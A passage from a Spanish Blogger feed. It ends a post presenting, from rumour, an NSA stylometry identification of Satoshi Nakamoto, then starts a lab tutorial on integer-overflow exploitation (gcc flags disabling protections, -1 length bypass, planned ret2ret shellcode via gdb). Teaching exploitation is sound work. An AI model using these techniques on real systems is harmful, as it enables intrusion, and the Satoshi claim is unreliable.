más escurridizo del mundo. La rumorología relata que muy pocas personas fuera
del Departamento de seguridad nacional (Department of Homeland Security),
saben el nombre real de Satoshi.&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPHGLFXAlgrKkp8JOmxNccKOZpZA1HPFcHsYHSjMuBUDcxaMwmbLOBSEXjlXXTwKe0CKY7ywQPnvPbJRwLoxIEeWFcE62J-271KFhdWzwzH2Mwy6EvkZgic0GqVemKp-Za0RoZipElFc8/s1600/who-is-satoshi-nakamoto.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;200&quot; data-original-width=&quot;350&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPHGLFXAlgrKkp8JOmxNccKOZpZA1HPFcHsYHSjMuBUDcxaMwmbLOBSEXjlXXTwKe0CKY7ywQPnvPbJRwLoxIEeWFcE62J-271KFhdWzwzH2Mwy6EvkZgic0GqVemKp-Za0RoZipElFc8/s1600/who-is-satoshi-nakamoto.png&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;El creador de Bitcoin Satoshi se ha preocupado
mucho en mantener su identidad en secreto empleando los últimos métodos de cifrado
y ocultación en sus comunicaciones. No obstante, el enigmático a lo largo de
los años escribió miles de mensajes y correos electrónicos y la mayoría de los
cuales está disponible al público.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;Por lo visto nuestra forma de expresarnos también es única y
al igual que ocurre por ejemplo con nuestra huella dactilar, es decir vuestras palabras
son tus huellas dactilares. El arte que estudia esto se llama Stylometry.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;Stylometry se utiliza a menudo para atribuir la autoría o no
de documentos anónimos o disputados. &lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;La NSA fue capaz de usar el método de ‘writer invariant’ de
stylometry para comparar escrituras &#39;conocidas&#39; de Satoshi con billones de
escritura muestras de personas en todo el mundo. Al tomar textos de Satoshi y
encontrar las 50 palabras más comunes, la NSA fue capaz de romper su texto en
5.000 pedazos de palabra y analizar cada uno para encontrar la frecuencia de
las 50 palabras. Esto resultaría en un identificador 50-números únicos para
cada fragmento.&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;La NSA luego coloco cada uno de estos números y procede al análisis
de componentes principales. El resultado es una &#39;huella digital&#39; que fácilmente
podría compararse a cualquier otra escritura.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;¿Qué tardaría la NSA en analizar los flujos de datos que
tienen de los programas PRISM y MUSCULAR y el obtenido de Satoshi?&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;¿Es prácticamente imposible ser anónimo en Internet? ¿Puede
ser Satoshi varias personas o una agencia de seguridad?&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;En conclusión si una organización, como la NSA quiere
encontrarte lo harán.&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;o:p&gt;Fuentes:&amp;nbsp;https://medium.com/@amuse/how-the-nsa-caught-satoshi-nakamoto-868affcef595&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;o:p&gt;https://en.wikipedia.org/wiki/Stylometry&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;o:p&gt;https://es.wikipedia.org/wiki/MUSCULAR&lt;/o:p&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='https://estacioninformatica.blogspot.com/feeds/3767354837816604063/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='https://estacioninformatica.blogspot.com/2017/08/stylometry-o-como-identifican-satoshi.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/2635749723269966578/posts/default/3767354837816604063'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/2635749723269966578/posts/default/3767354837816604063'/><link rel='alternate' type='text/html' href='https://estacioninformatica.blogspot.com/2017/08/stylometry-o-como-identifican-satoshi.html' title='Stylometry o como identifican Satoshi Nakamoto'/><author><name>n0ipr0cs</name><uri>http://www.blogger.com/profile/04491865020723502347</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPHGLFXAlgrKkp8JOmxNccKOZpZA1HPFcHsYHSjMuBUDcxaMwmbLOBSEXjlXXTwKe0CKY7ywQPnvPbJRwLoxIEeWFcE62J-271KFhdWzwzH2Mwy6EvkZgic0GqVemKp-Za0RoZipElFc8/s72-c/who-is-satoshi-nakamoto.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2635749723269966578.post-8694569513334219169</id><published>2017-06-27T00:17:00.000+02:00</published><updated>2017-06-27T00:17:56.427+02:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="ASLR"/><category scheme="http://www.blogger.com/atom/ns#" term="assembly"/><category scheme="http://www.blogger.com/atom/ns#" term="de 0 a exploiting"/><category scheme="http://www.blogger.com/atom/ns#" term="Exploit"/><category scheme="http://www.blogger.com/atom/ns#" term="exploit remoto"/><category scheme="http://www.blogger.com/atom/ns#" term="exploiting"/><category scheme="http://www.blogger.com/atom/ns#" term="Fare9"/><category scheme="http://www.blogger.com/atom/ns#" term="Python"/><title type='text'>De 0 a exploiting (X)</title><content type='html'>Hello my friends, soy Fare9, y ya conocéis esta sección, de 0 a exploiting en estos 10 números nos está enseñando qué es esto del exploiting y cómo llevarlo a cabo (No nos hemos quedado en el típico AAAAAAAAAAAAA y explota). Ya sabéis que, podéis seguirme en twitter &lt;a href=&quot;https://twitter.com/Erockandblues&quot; target=&quot;_blank&quot;&gt;Fare9&lt;/a&gt; donde pondré mis últimas noticias (espero dentro de poco dar la noticia de un taller presencial).&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Bienvenidos a todos de nuevo, aquí con vosotros Fare9.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkErgVWcbQcZ4TgY5aN1MF5U_AbXr2ZbTc5woyJswvm1nS01UR335zM53T018eCbKiGuJOFs3wr7VKQf7tFFQUWHn0N5tG3pjJ4SYB0EEqLgvlKGA21-IQw1msd729mriKMPMXvHl9KWs/s1600/13202760.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;210&quot; data-original-width=&quot;210&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkErgVWcbQcZ4TgY5aN1MF5U_AbXr2ZbTc5woyJswvm1nS01UR335zM53T018eCbKiGuJOFs3wr7VKQf7tFFQUWHn0N5tG3pjJ4SYB0EEqLgvlKGA21-IQw1msd729mriKMPMXvHl9KWs/s1600/13202760.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Hoy veremos qué es el integer overflow, un exploit remoto y como sorpresa, voy a mostrar un exploit para algunos servidores Python.&lt;br /&gt;
&lt;br /&gt;
Recordemos que tenemos que hacer para compilar:&lt;br /&gt;
###############################################&lt;br /&gt;
&lt;br /&gt;
gcc -g -fno-stack-protector -z execstack codigo.c -o programa&lt;br /&gt;
&lt;br /&gt;
############################################### &lt;br /&gt;
&lt;br /&gt;
Empezamos:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Integer Overflow&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
estas vulnerabilidades, son debidas a como un ordenador trata los números, así como los valores que es capaz de almacenar como máximo, como sabemos, un ordenador puede representar números según la capacidad de almacenamiento de sus tipos.&lt;br /&gt;
Una variable entera (Integer), en un sistema de 32 bits, es capaz de almacenar 4 bytes (...32 bits), eso significa que tiene entonces un límite de representación. Los valores enteros se pueden representar de dos formas:&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Sin signo (no hay negativos): estos pueden representar (en el caso de los tipo int) desde el valor 0 (32 bits igual a 0), hasta el valor 4294967295 (32 bits igual a 1) o más sencillo de calcular 2^32 - 1.&lt;/li&gt;
&lt;li&gt;Con signo(hay negativos): estos pueden representar (en el caso de los tipo int) desde el valor -2147483648 ( 32 bits igual a 1 ), hasta el valor 2147483647 (31 bits igual a 1 y el más representativo a 0). Esto es así ya que se utiliza el tipo de representación Complemento a 2, donde el primer valor nos dice si el número es positivo (0) o negativo (1). Dejo un enlace a wikipedia, donde viene explicado como pasar los números de decimal a binario en complemento a 2 &lt;a href=&quot;https://es.wikipedia.org/wiki/Complemento_a_dos&quot; target=&quot;_blank&quot;&gt;https://es.wikipedia.org/wiki/Complemento_a_dos&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
Existen otros tipos enteros, como por ejemplo short que ocupa 2 bytes, aquí dejo una tabla que indica los valores máximos y mínimos:&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbKdYI4x05hJA4XvS-jxETjghHL-k3fJTbkjuZlS8fLrzsYRHWYvahE0TnJ3fefWg-zDuI2YIEZKrAF_7pzR6PPwD82llLzs1oPOYFwjDYMXUvS79jA6Z6_ZT9xBgc4NZOd2hV6V5b4b4/s1600/tablavalues.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;173&quot; data-original-width=&quot;651&quot; height=&quot;170&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbKdYI4x05hJA4XvS-jxETjghHL-k3fJTbkjuZlS8fLrzsYRHWYvahE0TnJ3fefWg-zDuI2YIEZKrAF_7pzR6PPwD82llLzs1oPOYFwjDYMXUvS79jA6Z6_ZT9xBgc4NZOd2hV6V5b4b4/s640/tablavalues.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
Ahora vamos a hacernos una pregunta, ¿cuál es el resultado a la siguiente operación?&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0aUqzYN7ZLqQyPamAj6v9RLuTFm0_zEqSSfEp1dl2O5sAKq-t02ik5XF6pU2ydQQ1qTBcz27pbTJDlF8fBs-aqNURvJSnP9R8M0mJxVfW8UiU-dMOGu-eS3XU9YYdKl-ZoJ6WJCvfHrI/s1600/operacion.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;49&quot; data-original-width=&quot;377&quot; height=&quot;82&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0aUqzYN7ZLqQyPamAj6v9RLuTFm0_zEqSSfEp1dl2O5sAKq-t02ik5XF6pU2ydQQ1qTBcz27pbTJDlF8fBs-aqNURvJSnP9R8M0mJxVfW8UiU-dMOGu-eS3XU9YYdKl-ZoJ6WJCvfHrI/s640/operacion.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&amp;nbsp;Tendremos en cuenta que cada valor hexadecimal son 4 bits, y dos valores hexadecimales son 1 byte (8 bits), por tanto cada f = 1111 . En hexadecimal la respuesta a esta operación es: 0x100000000, pero ¿qué problema hay?&lt;br /&gt;
Que si sólo podemos tener máximo 32 bits, estamos metiendo más de 32, por tanto, esto no es representable y se trunca al valor 0x00000000, y se establece a 1 el bit CF o el OF. Y en caso de tener números con signo, hemos pasado de un número negativo a uno positivo, y aquí vienen los problemas.&lt;br /&gt;
Vamos a ver un ejemplo sencillo en el que ver esto:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicaEC7whHLJFoDKnVmIzFhQ6-6-57w6LVkihEMDqEFVQqDyMQIxWh8XwZWLc-ifSLsme6ltkhWkWSz9bAYiCja8NKhC0jOu55F1J0DxzOpoZ7qaR-EgD6GLvdqGyK6wsNMXpffvJ7juPQ/s1600/integer1.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;452&quot; data-original-width=&quot;855&quot; height=&quot;338&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicaEC7whHLJFoDKnVmIzFhQ6-6-57w6LVkihEMDqEFVQqDyMQIxWh8XwZWLc-ifSLsme6ltkhWkWSz9bAYiCja8NKhC0jOu55F1J0DxzOpoZ7qaR-EgD6GLvdqGyK6wsNMXpffvJ7juPQ/s640/integer1.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Bien, vemos que tenemos un id que es un integer con signo, y que si ese valor es mayor que 10, saldrá del programa con un -1, y si es menor que 10 o igual que 10, ejecutará check_id,&lt;br /&gt;
bien, check_id ejecutará una shell, en caso de que el valor metido sea mayor que 10...&lt;br /&gt;
Pero Fare9, ya controlabamos antes, que el valor no fuera mayor a 10.&lt;br /&gt;
&lt;br /&gt;
Pero si nos damos cuenta, el valor dentro de los argumentos en check_id, es un unsigned int id, si metemos un valor de -1, este valor en binario es: &lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;11111111111111111111111111111111. Peeeero, claro el id del método, ese argumento no admite valores negativos, por tanto ese &lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;11111111111111111111111111111111, en decimal sin signo es igual a ‭4294967295‬ (tal y como veíamos en la tabla de arriba).&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Este valor entonces es mayor que 10, y por tanto se ejecutará la shell:&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi8tbNWKUZ6UlJ0tLsBFY1gQSFX_mbfCev_TYzLeO_InaL-fei416EzsxORy77j_5B2VSu3QfdY19GzssSle9-Ivkzzwmp8VssrlbPE7QNbeDFT0PuAGIqnqRQrzIa7-F7FPvOFrq3Bd8/s1600/fallo.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;142&quot; data-original-width=&quot;890&quot; height=&quot;102&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi8tbNWKUZ6UlJ0tLsBFY1gQSFX_mbfCev_TYzLeO_InaL-fei416EzsxORy77j_5B2VSu3QfdY19GzssSle9-Ivkzzwmp8VssrlbPE7QNbeDFT0PuAGIqnqRQrzIa7-F7FPvOFrq3Bd8/s640/fallo.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Como vemos con un -1, el ID que se muestra en el método no es -1, sino el valor máximo representable por un unsigned int, y se ha ejecutado la shell.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Ya hemos entendido los problemas que pueden darse debido a este tipo de errores, ahora vamos a ver un programa vulnerable:&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho8nHrDcOMxpnsXZgUoqi0ev7rLCxRFKhu447zB-Ss3cAluiX2Txh0dCNFkxQG2D1wCqbd_TiDCXK0tNioxnCP7FFJtok2o0kga39Y23kyE2dOf6as0AtTT0SXCvKy7F16Qql0IyPdLB0/s1600/vulnerable.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;637&quot; data-original-width=&quot;759&quot; height=&quot;536&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho8nHrDcOMxpnsXZgUoqi0ev7rLCxRFKhu447zB-Ss3cAluiX2Txh0dCNFkxQG2D1wCqbd_TiDCXK0tNioxnCP7FFJtok2o0kga39Y23kyE2dOf6as0AtTT0SXCvKy7F16Qql0IyPdLB0/s640/vulnerable.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Este programa quizás no es tan fácil de ver, pero explicaré un poco lo que hace, como primer parámetro le pasaremos el tamaño del segundo parámetro, que pasa, que el valor este que le demos, no puede ser mayor a 255, pues en ese caso obtendremos un mensaje indicando que la longitud es excesiva. Compilaremos como vimos arriba y vemos que pasa si damos un número mayor a 255, indicando que vamos a meter por ejemplo 300 As:&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2RPOCqukTcclgVc3Iutn7dvfjjGo9jRJDm8bhUO3gPSyskA4q7Kf6uCwrUUNCZgvn36cpHKYoXbW7Q0eGg3aJYkxckPb40GTk3JvLLq3e7EJgGlc8cnknDejRuX1q_xCFgG2584RrUyE/s1600/longitudExcesiva.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;123&quot; data-original-width=&quot;1068&quot; height=&quot;72&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2RPOCqukTcclgVc3Iutn7dvfjjGo9jRJDm8bhUO3gPSyskA4q7Kf6uCwrUUNCZgvn36cpHKYoXbW7Q0eGg3aJYkxckPb40GTk3JvLLq3e7EJgGlc8cnknDejRuX1q_xCFgG2584RrUyE/s640/longitudExcesiva.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Vemos que el valor &quot;len&quot; es un integer con signo, por tanto si metemos un -1 no sobrepasará el checkeo de if (len &amp;gt;= 256), y podremos seguir, luego vemos que &quot;l&quot;, es un entero sin signo, y si metemos un -1, &quot;l&quot; valdrá como vimos antes un número enorme &quot;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;‭4294967295&quot;.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Por tanto podremos meter un string muy grande, y como vemos, el programador hizo un strncpy de 280 cuando sólo hay hueco para 256 caracteres. Como veíamos en programas anteriores esto es vulnerable. Vamos entonces a probar a meter un -1 de longitud, y 300 &#39;As&#39;, a ver si peta el programa para ver si es vulnerable. y peta:&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA1G207LCbxFv3lWfG2ZB4JYhKguQy5CIsrQ7cIu4IrkePBAk1PGxcdOM4S9xpq1KqCRy-pvDcE_pHCT5rMhCvg3-OZUzBxdB0w2wCK3W7pm9dJjrrib4kI9mTKBN4Cm6q99S15dq69PI/s1600/petada.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;128&quot; data-original-width=&quot;1060&quot; height=&quot;76&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA1G207LCbxFv3lWfG2ZB4JYhKguQy5CIsrQ7cIu4IrkePBAk1PGxcdOM4S9xpq1KqCRy-pvDcE_pHCT5rMhCvg3-OZUzBxdB0w2wCK3W7pm9dJjrrib4kI9mTKBN4Cm6q99S15dq69PI/s640/petada.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Vemos, que hemos pasado el check y se ha realizado el strncpy, petando el programa.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Tenemos que ver como aprovechar esta vulnerabilidad, vemos que el primer parámetro pasado al método es la cadena, si esta cadena contiene una shellcode, podríamos intentar por ejemplo un &quot;ret2ret&quot;, ya que después de EIP se guardará el puntero a esta cadena y por tanto al shellcode, y el shellcode se ejecutará (Todo explicado en: &lt;a href=&quot;https://estacioninformatica.blogspot.com.es/2017/05/de-0-exploiting-ix.html&quot; target=&quot;_blank&quot;&gt;De 0 a exploiting IX&lt;/a&gt;).&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Primero entonces tendremos que ver cuantos bytes nos permite el buffer introducir, para ello usaremos nuestro querido pattern petater con 300 bytes por ejemplo, y usaremos el truco del -1.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Abrimos el programa con gdb:&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWf7WIH6HWtf61JIUyOmcPsnrH6wj5hp4C5thhIpKRNG7c641nd4aYYv4N-lGMm1jcyJKQhFrhbZR76nB3RBv7iHu8X7H9tMAV74cHO-v5MOKshSbmXzJ0_W1FuSLZAS5tJKpvFw6i1tA/s1600/gdb1.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;66&quot; data-original-width=&quot;868&quot; height=&quot;48&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWf7WIH6HWtf61JIUyOmcPsnrH6wj5hp4C5thhIpKRNG7c641nd4aYYv4N-lGMm1jcyJKQhFrhbZR76nB3RBv7iHu8X7H9tMAV74cHO-v5MOKshSbmXzJ0_W1FuSLZAS5tJKpvFw6i1tA/s640/gdb1.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Ahora generaremos 300 bytes con pattern petater:&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicfOcjogAxx3s23wQ7BkGag8wj9biLVPuDPLoO6JjpdYnjTJq9kL03mrnjqs5h3yOfK6XPLH9CXxqFDYp8YM4UJ2NHQHFOyQRDIF3oh7iR9B64G4Nkp-nuY-m_TuZSUtCVbK9jvasSdUE/s1600/patternpetater1.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;134&quot; data-original-width=&quot;1302&quot; height=&quot;64&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicfOcjogAxx3s23wQ7BkGag8wj9biLVPuDPLoO6JjpdYnjTJq9kL03mrnjqs5h3yOfK6XPLH9CXxqFDYp8YM4UJ2NHQHFOyQRDIF3oh7iR9B64G4Nkp-nuY-m_TuZSUtCVbK9jvasSdUE/s640/patternpetater1.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Lo pegaremos directamente en gdb de la siguiente manera:&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
